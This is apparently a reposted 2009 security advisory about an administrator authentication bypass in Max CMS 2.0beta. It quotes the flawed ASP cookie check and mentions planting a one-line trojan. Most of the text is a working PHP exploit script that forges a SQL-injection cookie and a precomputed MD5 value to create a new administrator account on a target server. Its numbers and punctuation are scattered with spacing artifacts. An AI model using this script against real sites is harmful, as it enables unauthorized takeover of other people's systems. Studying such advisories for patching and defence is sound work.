Max CMS2. 0beta (maxcms)administrator authentication bypass vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200922095
Type myhack58
Reporter 佚名
Modified 2009-02-08T00:00:00


by flyh4t

maxcms background have auto upgrade function, the ajax that the injection is patched, but the vulnerability still not patched. In the previous patch with classmates to see if they can bypass the authentication, the answer is Yes, but the premise is to know the background of the directory address

Review the following exploit code

Sub checkPower dim loginValidate,rsObj : loginValidate = "maxcms2. 0" err. clear on error resume next set rsObj=conn. db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute") loginValidate = md5(getAgent&getIp&rsObj(0)) if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top. location. href='index. asp? action=login';</script>" if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top. location. href='index. asp? action=login';</script>" checkManagerLevel rsObj(1) set rsObj=nothing End Sub


Function rCookie(cookieName) rCookie = request. cookies(cookieName) End Function

The key is the value of this variable loginValidate = md5(getAgent&getIp&rsObj(0)) Via forged Cookies can easily bypass this authentication code, after which you can add a new administrator or modify the configuration file to insert the phrase Trojan

Here I posted a add new administrator exp

<? php print_r(' +---------------------------------------------------------------------------+ maxcms2. 0 creat new admin exploit by Flyh4t team:wolvez security team +---------------------------------------------------------------------------+ ');

if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to maxcms Example: php '.$ argv[0].' localhost /maxcms2/ +---------------------------------------------------------------------------+ '); exit; }

error_reporting(7); ini_set('max_execution_time', 0);

$host = $argv[1]; $path = $argv[2]; $name = rand(1,10000); $cmd = 'm_username=flyh4t'.$ name.'& m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd); if (! eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}

print_r(' +---------------------------------------------------------------------------+ [+]cool,exploit seccuss [+]you have add a new adminuser flyh4t'.$ name.'/ wolvez +---------------------------------------------------------------------------+ ');

function send($cmd) { global $host, $path; $message = "POST ".$ path."admin/admin_manager. asp? action=add HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Referer: http://$host$path\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: flyh4t\r\n"; $message .= "X-Forwarded-For:\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; echo $message;

$fp = fsockopen($host, 8 0); fputs($fp, $message);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4); echo $resp; return $resp; } ?>